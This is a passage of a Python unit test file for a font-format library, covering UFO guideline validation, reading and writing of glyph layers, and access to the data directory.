writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# angle
## < 0
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, y=0, angle=-1)]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## > 360
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, y=0, angle=361)]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# name
## not a string
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, name=1)]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# color
## not a string
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color=1)]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## not enough commas
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color="1 0, 0, 0")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color="1 0 0, 0")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color="1 0 0 0")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## not enough parts
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color=", 0, 0, 0")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color="1, , 0, 0")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color="1, 0, , 0")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color="1, 0, 0, ")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color=", , , ")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## not a number in all positions
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color="r, 1, 1, 1")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color="1, g, 1, 1")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color="1, 1, b, 1")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color="1, 1, 1, a")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## too many parts
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color="1, 0, 0, 0, 0")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## < 0 in each position
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color="-1, 0, 0, 0")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color="0, -1, 0, 0")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color="0, 0, -1, 0")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color="0, 0, 0, -1")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## > 1 in each position
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color="2, 0, 0, 0")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color="0, 2, 0, 0")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color="0, 0, 2, 0")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, color="0, 0, 0, 2")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# identifier
## duplicate
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, identifier="guide1"), dict(y=0, identifier="guide1")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## below min
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, identifier="\0x1F")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## above max
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x=0, identifier="\0x7F")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# ------
# layers
# ------
class UFO3ReadLayersTestCase(unittest.TestCase):
def setUp(self):
self.tempDir = tempfile.mktemp()
os.mkdir(self.tempDir)
self.ufoPath = os.path.join(self.tempDir, "test.ufo")
def tearDown(self):
shutil.rmtree(self.tempDir)
def makeUFO(self, metaInfo=None, layerContents=None):
self.clearUFO()
if not os.path.exists(self.ufoPath):
os.mkdir(self.ufoPath)
# metainfo.plist
if metaInfo is None:
metaInfo = dict(creator="test", formatVersion=3)
path = os.path.join(self.ufoPath, "metainfo.plist")
with open(path, "wb") as f:
writePlist(metaInfo, f)
# layers
if layerContents is None:
layerContents = [
("public.default", "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 2"),
]
if layerContents:
path = os.path.join(self.ufoPath, "layercontents.plist")
with open(path, "wb") as f:
writePlist(layerContents, f)
else:
layerContents = [("", "glyphs")]
for name, directory in layerContents:
glyphsPath = os.path.join(self.ufoPath, directory)
os.mkdir(glyphsPath)
contents = dict(a="a.glif")
path = os.path.join(glyphsPath, "contents.plist")
with open(path, "wb") as f:
writePlist(contents, f)
path = os.path.join(glyphsPath, "a.glif")
with open(path, "w") as f:
f.write(" ")
def clearUFO(self):
if os.path.exists(self.ufoPath):
shutil.rmtree(self.ufoPath)
# valid
def testValidRead(self):
# UFO 1
self.makeUFO(
metaInfo=dict(creator="test", formatVersion=1),
layerContents=dict()
)
reader = UFOReader(self.ufoPath)
reader.getGlyphSet()
# UFO 2
self.makeUFO(
metaInfo=dict(creator="test", formatVersion=2),
layerContents=dict()
)
reader = UFOReader(self.ufoPath)
reader.getGlyphSet()
# UFO 3
self.makeUFO()
reader = UFOReader(self.ufoPath)
reader.getGlyphSet()
# missing layer contents
def testMissingLayerContents(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
reader = UFOReader(self.ufoPath)
self.assertRaises(UFOLibError, reader.getGlyphSet)
# layer contents invalid format
def testInvalidLayerContentsFormat(self):
# bogus
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
with open(path, "w") as f:
f.write("test")
reader = UFOReader(self.ufoPath)
self.assertRaises(UFOLibError, reader.getGlyphSet)
# dict
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = {
"public.default" : "glyphs",
"layer 1" : "glyphs.layer 1",
"layer 2" : "glyphs.layer 2",
}
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
self.assertRaises(UFOLibError, reader.getGlyphSet)
# layer contents invalid name format
def testInvalidLayerContentsNameFormat(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
(1, "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
self.assertRaises(UFOLibError, reader.getGlyphSet)
# layer contents invalid directory format
def testInvalidLayerContentsDirectoryFormat(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("public.foregound", "glyphs"),
("layer 1", 1),
("layer 2", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
self.assertRaises(UFOLibError, reader.getGlyphSet)
# directory listed in contents not on disk
def testLayerContentsHasMissingDirectory(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("public.foregound", "glyphs"),
("layer 1", "glyphs.doesnotexist"),
("layer 2", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
self.assertRaises(UFOLibError, reader.getGlyphSet)
# # directory on disk not listed in contents
# XXX should this raise an error?
#
# def testLayerContentsHasMissingDirectory(self):
# self.makeUFO()
# path = os.path.join(self.ufoPath, "layercontents.plist")
# os.remove(path)
# layerContents = [
# ("public.foregound", "glyphs"),
# ("layer 1", "glyphs.layer 2")
# ]
# with open(path, "wb") as f:
# writePlist(layerContents, f)
# reader = UFOReader(self.ufoPath)
# with self.assertRaises(UFOLibError):
# reader.getGlyphSet()
# no default layer on disk
def testMissingDefaultLayer(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
self.assertRaises(UFOLibError, reader.getGlyphSet)
# duplicate layer name
def testDuplicateLayerName(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("public.foregound", "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 1", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
self.assertRaises(UFOLibError, reader.getGlyphSet)
# directory referenced by two layer names
def testDuplicateLayerDirectory(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("public.foregound", "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 1")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
self.assertRaises(UFOLibError, reader.getGlyphSet)
# default without a name
def testDefaultLayerNoName(self):
# get the glyph set
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("public.foregound", "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
reader.getGlyphSet()
# default with a name
def testDefaultLayerName(self):
# get the name
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("custom name", "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 2")
]
expected = layerContents[0][0]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
result = reader.getDefaultLayerName()
self.assertEqual(expected, result)
# get the glyph set
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("custom name", "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
reader.getGlyphSet(expected)
# layer order
def testLayerOrder(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("public.foregound", "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 2")
]
expected = [name for (name, directory) in layerContents]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
result = reader.getLayerNames()
self.assertEqual(expected, result)
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("layer 1", "glyphs.layer 1"),
("public.foregound", "glyphs"),
("layer 2", "glyphs.layer 2")
]
expected = [name for (name, directory) in layerContents]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
result = reader.getLayerNames()
self.assertEqual(expected, result)
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("layer 2", "glyphs.layer 2"),
("layer 1", "glyphs.layer 1"),
("public.foregound", "glyphs")
]
expected = [name for (name, directory) in layerContents]
with open(path, "wb") as f:
writePlist(layerContents, f)
reader = UFOReader(self.ufoPath)
result = reader.getLayerNames()
self.assertEqual(expected, result)
class UFO3WriteLayersTestCase(unittest.TestCase):
def setUp(self):
self.tempDir = tempfile.mktemp()
os.mkdir(self.tempDir)
self.ufoPath = os.path.join(self.tempDir, "test.ufo")
def tearDown(self):
shutil.rmtree(self.tempDir)
def makeUFO(self, metaInfo=None, layerContents=None):
self.clearUFO()
if not os.path.exists(self.ufoPath):
os.mkdir(self.ufoPath)
# metainfo.plist
if metaInfo is None:
metaInfo = dict(creator="test", formatVersion=3)
path = os.path.join(self.ufoPath, "metainfo.plist")
with open(path, "wb") as f:
writePlist(metaInfo, f)
# layers
if layerContents is None:
layerContents = [
("public.default", "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 2"),
]
if layerContents:
path = os.path.join(self.ufoPath, "layercontents.plist")
with open(path, "wb") as f:
writePlist(layerContents, f)
else:
layerContents = [("", "glyphs")]
for name, directory in layerContents:
glyphsPath = os.path.join(self.ufoPath, directory)
os.mkdir(glyphsPath)
contents = dict(a="a.glif")
path = os.path.join(glyphsPath, "contents.plist")
with open(path, "wb") as f:
writePlist(contents, f)
path = os.path.join(glyphsPath, "a.glif")
with open(path, "w") as f:
f.write(" ")
def clearUFO(self):
if os.path.exists(self.ufoPath):
shutil.rmtree(self.ufoPath)
# __init__: missing layer contents
def testMissingLayerContents(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
self.assertRaises(UFOLibError, UFOWriter, self.ufoPath)
# __init__: layer contents invalid format
def testInvalidLayerContentsFormat(self):
# bogus
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
with open(path, "w") as f:
f.write("test")
self.assertRaises(UFOLibError, UFOWriter, self.ufoPath)
# dict
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = {
"public.default" : "glyphs",
"layer 1" : "glyphs.layer 1",
"layer 2" : "glyphs.layer 2",
}
with open(path, "wb") as f:
writePlist(layerContents, f)
self.assertRaises(UFOLibError, UFOWriter, self.ufoPath)
# __init__: layer contents invalid name format
def testInvalidLayerContentsNameFormat(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
(1, "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
self.assertRaises(UFOLibError, UFOWriter, self.ufoPath)
# __init__: layer contents invalid directory format
def testInvalidLayerContentsDirectoryFormat(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("public.foregound", "glyphs"),
("layer 1", 1),
("layer 2", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
self.assertRaises(UFOLibError, UFOWriter, self.ufoPath)
# __init__: directory listed in contents not on disk
def testLayerContentsHasMissingDirectory(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("public.foregound", "glyphs"),
("layer 1", "glyphs.doesnotexist"),
("layer 2", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
self.assertRaises(UFOLibError, UFOWriter, self.ufoPath)
# __init__: no default layer on disk
def testMissingDefaultLayer(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
self.assertRaises(UFOLibError, UFOWriter, self.ufoPath)
# __init__: duplicate layer name
def testDuplicateLayerName(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("public.foregound", "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 1", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
self.assertRaises(UFOLibError, UFOWriter, self.ufoPath)
# __init__: directory referenced by two layer names
def testDuplicateLayerDirectory(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("public.foregound", "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 1")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
self.assertRaises(UFOLibError, UFOWriter, self.ufoPath)
# __init__: default without a name
def testDefaultLayerNoName(self):
# get the glyph set
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("public.foregound", "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
writer = UFOWriter(self.ufoPath)
# __init__: default with a name
def testDefaultLayerName(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "layercontents.plist")
os.remove(path)
layerContents = [
("custom name", "glyphs"),
("layer 1", "glyphs.layer 1"),
("layer 2", "glyphs.layer 2")
]
with open(path, "wb") as f:
writePlist(layerContents, f)
writer = UFOWriter(self.ufoPath)
# __init__: up convert 1 > 3
def testUpConvert1To3(self):
self.makeUFO(
metaInfo=dict(creator="test", formatVersion=1),
layerContents=dict()
)
writer = UFOWriter(self.ufoPath)
writer.writeLayerContents(["public.default"])
path = os.path.join(self.ufoPath, "layercontents.plist")
with open(path, "rb") as f:
result = readPlist(f)
expected = [["public.default", "glyphs"]]
self.assertEqual(expected, result)
# __init__: up convert 2 > 3
def testUpConvert2To3(self):
self.makeUFO(
metaInfo=dict(creator="test", formatVersion=2),
layerContents=dict()
)
writer = UFOWriter(self.ufoPath)
writer.writeLayerContents(["public.default"])
path = os.path.join(self.ufoPath, "layercontents.plist")
with open(path, "rb") as f:
result = readPlist(f)
expected = [["public.default", "glyphs"]]
self.assertEqual(expected, result)
# __init__: down convert 3 > 1
def testDownConvert3To1(self):
self.makeUFO()
self.assertRaises(UFOLibError, UFOWriter, self.ufoPath, formatVersion=1)
# __init__: down convert 3 > 2
def testDownConvert3To2(self):
self.makeUFO()
self.assertRaises(UFOLibError, UFOWriter, self.ufoPath, formatVersion=2)
# get glyph sets
def testGetGlyphSets(self):
self.makeUFO()
# hack contents.plist
path = os.path.join(self.ufoPath, "glyphs.layer 1", "contents.plist")
with open(path, "wb") as f:
writePlist(dict(b="a.glif"), f)
path = os.path.join(self.ufoPath, "glyphs.layer 2", "contents.plist")
with open(path, "wb") as f:
writePlist(dict(c="a.glif"), f)
# now test
writer = UFOWriter(self.ufoPath)
# default
expected = ["a"]
result = list(writer.getGlyphSet().keys())
self.assertEqual(expected, result)
# layer 1
expected = ["b"]
result = list(writer.getGlyphSet("layer 1", defaultLayer=False).keys())
self.assertEqual(expected, result)
# layer 2
expected = ["c"]
result = list(writer.getGlyphSet("layer 2", defaultLayer=False).keys())
self.assertEqual(expected, result)
# make a new font with two layers
def testNewFontOneLayer(self):
self.clearUFO()
writer = UFOWriter(self.ufoPath)
writer.getGlyphSet()
writer.writeLayerContents(["public.default"])
# directory
path = os.path.join(self.ufoPath, "glyphs")
exists = os.path.exists(path)
self.assertEqual(True, exists)
# layer contents
path = os.path.join(self.ufoPath, "layercontents.plist")
with open(path, "rb") as f:
result = readPlist(f)
expected = [["public.default", "glyphs"]]
self.assertEqual(expected, result)
def testNewFontThreeLayers(self):
self.clearUFO()
writer = UFOWriter(self.ufoPath)
writer.getGlyphSet("layer 1", defaultLayer=False)
writer.getGlyphSet()
writer.getGlyphSet("layer 2", defaultLayer=False)
writer.writeLayerContents(["layer 1", "public.default", "layer 2"])
# directories
path = os.path.join(self.ufoPath, "glyphs")
exists = os.path.exists(path)
self.assertEqual(True, exists)
path = os.path.join(self.ufoPath, "glyphs.layer 1")
exists = os.path.exists(path)
self.assertEqual(True, exists)
path = os.path.join(self.ufoPath, "glyphs.layer 2")
exists = os.path.exists(path)
self.assertEqual(True, exists)
# layer contents
path = os.path.join(self.ufoPath, "layercontents.plist")
with open(path, "rb") as f:
result = readPlist(f)
expected = [["layer 1", "glyphs.layer 1"], ["public.default", "glyphs"], ["layer 2", "glyphs.layer 2"]]
self.assertEqual(expected, result)
# add a layer to an existing font
def testAddLayerToExistingFont(self):
self.makeUFO()
writer = UFOWriter(self.ufoPath)
writer.getGlyphSet("layer 3", defaultLayer=False)
writer.writeLayerContents(["public.default", "layer 1", "layer 2", "layer 3"])
# directories
path = os.path.join(self.ufoPath, "glyphs")
exists = os.path.exists(path)
self.assertEqual(True, exists)
path = os.path.join(self.ufoPath, "glyphs.layer 1")
exists = os.path.exists(path)
self.assertEqual(True, exists)
path = os.path.join(self.ufoPath, "glyphs.layer 2")
exists = os.path.exists(path)
self.assertEqual(True, exists)
path = os.path.join(self.ufoPath, "glyphs.layer 3")
exists = os.path.exists(path)
self.assertEqual(True, exists)
# layer contents
path = os.path.join(self.ufoPath, "layercontents.plist")
with open(path, "rb") as f:
result = readPlist(f)
expected = [['public.default', 'glyphs'], ['layer 1', 'glyphs.layer 1'], ['layer 2', 'glyphs.layer 2'], ["layer 3", "glyphs.layer 3"]]
self.assertEqual(expected, result)
# rename valid name
def testRenameLayer(self):
self.makeUFO()
writer = UFOWriter(self.ufoPath)
writer.renameGlyphSet("layer 1", "layer 3")
writer.writeLayerContents(["public.default", "layer 3", "layer 2"])
# directories
path = os.path.join(self.ufoPath, "glyphs")
exists = os.path.exists(path)
self.assertEqual(True, exists)
path = os.path.join(self.ufoPath, "glyphs.layer 1")
exists = os.path.exists(path)
self.assertEqual(False, exists)
path = os.path.join(self.ufoPath, "glyphs.layer 2")
exists = os.path.exists(path)
self.assertEqual(True, exists)
path = os.path.join(self.ufoPath, "glyphs.layer 3")
exists = os.path.exists(path)
self.assertEqual(True, exists)
# layer contents
path = os.path.join(self.ufoPath, "layercontents.plist")
with open(path, "rb") as f:
result = readPlist(f)
expected = [['public.default', 'glyphs'], ['layer 3', 'glyphs.layer 3'], ['layer 2', 'glyphs.layer 2']]
self.assertEqual(expected, result)
def testRenameLayerDefault(self):
self.makeUFO()
writer = UFOWriter(self.ufoPath)
writer.renameGlyphSet("public.default", "layer xxx")
writer.renameGlyphSet("layer 1", "layer 1", defaultLayer=True)
writer.writeLayerContents(["layer xxx", "layer 1", "layer 2"])
path = os.path.join(self.ufoPath, "glyphs")
exists = os.path.exists(path)
self.assertEqual(True, exists)
path = os.path.join(self.ufoPath, "glyphs.layer 1")
exists = os.path.exists(path)
self.assertEqual(False, exists)
path = os.path.join(self.ufoPath, "glyphs.layer 2")
exists = os.path.exists(path)
self.assertEqual(True, exists)
path = os.path.join(self.ufoPath, "glyphs.layer xxx")
exists = os.path.exists(path)
self.assertEqual(True, exists)
# layer contents
path = os.path.join(self.ufoPath, "layercontents.plist")
with open(path, "rb") as f:
result = readPlist(f)
expected = [['layer xxx', 'glyphs.layer xxx'], ['layer 1', 'glyphs'], ['layer 2', 'glyphs.layer 2']]
self.assertEqual(expected, result)
# rename duplicate name
def testRenameLayerDuplicateName(self):
self.makeUFO()
writer = UFOWriter(self.ufoPath)
self.assertRaises(UFOLibError, writer.renameGlyphSet, "layer 1", "layer 2")
# rename unknown layer
def testRenameLayerDuplicateName(self):
self.makeUFO()
writer = UFOWriter(self.ufoPath)
self.assertRaises(UFOLibError, writer.renameGlyphSet, "does not exist", "layer 2")
# remove valid layer
def testRemoveLayer(self):
self.makeUFO()
writer = UFOWriter(self.ufoPath)
writer.deleteGlyphSet("layer 1")
writer.writeLayerContents(["public.default", "layer 2"])
# directories
path = os.path.join(self.ufoPath, "glyphs")
exists = os.path.exists(path)
self.assertEqual(True, exists)
path = os.path.join(self.ufoPath, "glyphs.layer 1")
exists = os.path.exists(path)
self.assertEqual(False, exists)
path = os.path.join(self.ufoPath, "glyphs.layer 2")
exists = os.path.exists(path)
self.assertEqual(True, exists)
# layer contents
path = os.path.join(self.ufoPath, "layercontents.plist")
with open(path, "rb") as f:
result = readPlist(f)
expected = [["public.default", "glyphs"], ["layer 2", "glyphs.layer 2"]]
self.assertEqual(expected, result)
# remove default layer
def testRemoveDefaultLayer(self):
self.makeUFO()
writer = UFOWriter(self.ufoPath)
writer.deleteGlyphSet("public.default")
# directories
path = os.path.join(self.ufoPath, "glyphs")
exists = os.path.exists(path)
self.assertEqual(False, exists)
path = os.path.join(self.ufoPath, "glyphs.layer 1")
exists = os.path.exists(path)
self.assertEqual(True, exists)
path = os.path.join(self.ufoPath, "glyphs.layer 2")
exists = os.path.exists(path)
self.assertEqual(True, exists)
# layer contents
path = os.path.join(self.ufoPath, "layercontents.plist")
with open(path, "rb") as f:
result = readPlist(f)
expected = [["layer 1", "glyphs.layer 1"], ["layer 2", "glyphs.layer 2"]]
self.assertEqual(expected, result)
# remove unknown layer
def testRemoveDefaultLayer(self):
self.makeUFO()
writer = UFOWriter(self.ufoPath)
self.assertRaises(UFOLibError, writer.deleteGlyphSet, "does not exist")
# -----
# /data
# -----
class UFO3ReadDataTestCase(unittest.TestCase):
def getFontPath(self):
testdata = os.path.join(os.path.dirname(__file__), "testdata")
return os.path.join(testdata, "UFO3-Read Data.ufo")
def testUFOReaderDataDirectoryListing(self):
reader = UFOReader(self.getFontPath())
found = reader.getDataDirectoryListing()
expected = [
'org.unifiedfontobject.directory%(s)sbar%(s)slol.txt' % {'s': os.sep},
'org.unifiedfontobject.directory%(s)sfoo.txt' % {'s': os.sep},
'org.unifiedfontobject.file.txt'
]
self.assertEqual(set(found), set(expected))
def testUFOReaderBytesFromPath(self):
reader = UFOReader(self.getFontPath())
found = reader.readBytesFromPath("data/org.unifiedfontobject.file.txt")
expected = b"file.txt"
self.assertEqual(found, expected)
found = reader.readBytesFromPath("data/org.unifiedfontobject.directory/bar/lol.txt")
expected = b"lol.txt"
self.assertEqual(found, expected)
found = reader.readBytesFromPath("data/org.unifiedfontobject.doesNotExist")
expected = None
self.assertEqual(found, expected)
def testUFOReaderReadFileFromPath(self):
reader = UFOReader(self.getFontPath())
fileObject = reader.getReadFileForPath("data/org.unifiedfontobject.file.txt")
self.assertNotEqual(fileObject, None)
hasRead = hasattr(fileObject, "read")
self.assertEqual(hasRead, True)
fileObject.close()
fileObject = reader.getReadFileForPath("data/org.unifiedfontobject.doesNotExist")
self.assertEqual(fileObject, None)
class UFO3WriteDataTestCase(unittest.TestCase):
def setUp(self):
self.tempDir = tempfile.mktemp()
os.mkdir(self.tempDir)
self.dstDir = os.path.join(self.tempDir, "test.ufo")
def tearDown(self):
shutil.rmtree(self.tempDir)
def tearDownUFO(self):
if os.path.exists(self.dstDir):
shutil.rmtree(self.dstDir)
def testUFOWriterWriteBytesToPath(self):
# basic file
path = "data/org.unifiedfontobject.writebytesbasicfile.txt"
testBytes = b"test"
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeBytesToPath(path, testBytes)
path = os.path.join(self.dstDir, path)
self.assertEqual(os.path.exists(path), True)
with open(path, "rb") as f:
written = f.read()
self.assertEqual(testBytes, written)
self.tearDownUFO()
# basic file with unicode text
path = "data/org.unifiedfontobject.writebytesbasicunicodefile.txt"
text = b"t\xeb\xdft"
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeBytesToPath(path, text)
path = os.path.join(self.dstDir, path)
self.assertEqual(os.path.exists(path), True)
